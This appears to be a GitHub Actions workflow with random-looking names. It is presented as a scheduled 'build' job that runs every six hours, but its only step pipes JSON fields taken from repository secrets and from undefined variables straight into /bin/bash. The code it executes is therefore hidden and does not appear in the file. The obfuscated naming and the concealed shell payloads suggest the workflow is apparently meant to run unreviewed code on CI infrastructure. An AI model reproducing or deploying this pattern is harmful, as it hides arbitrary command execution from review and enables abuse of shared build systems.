name: limiaozhen5421

on:
  workflow_dispatch:
  schedule:
    - cron: '33 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: limiaozhen5421
        env:
          xv3916: ${{ secrets.xv3916 }}
        run: |
          echo $xv3916 | jq -r .ozg47 | /bin/bash
          echo $tfpa25173 | jq -r .oboc27 | /bin/bash
          echo $pash850 | jq -r .xtzy1 | /bin/bash
          echo $domm1 | jq -r .mzu113 | /bin/bash
          echo $k48345 | jq -r .no906 | /bin/bash
          echo $p13 | jq -r .vu017 | /bin/bash
          echo $ft89304 | jq -r .btg308 | /bin/bash
          echo $xbx7750 | jq -r .dfdn92 | /bin/bash

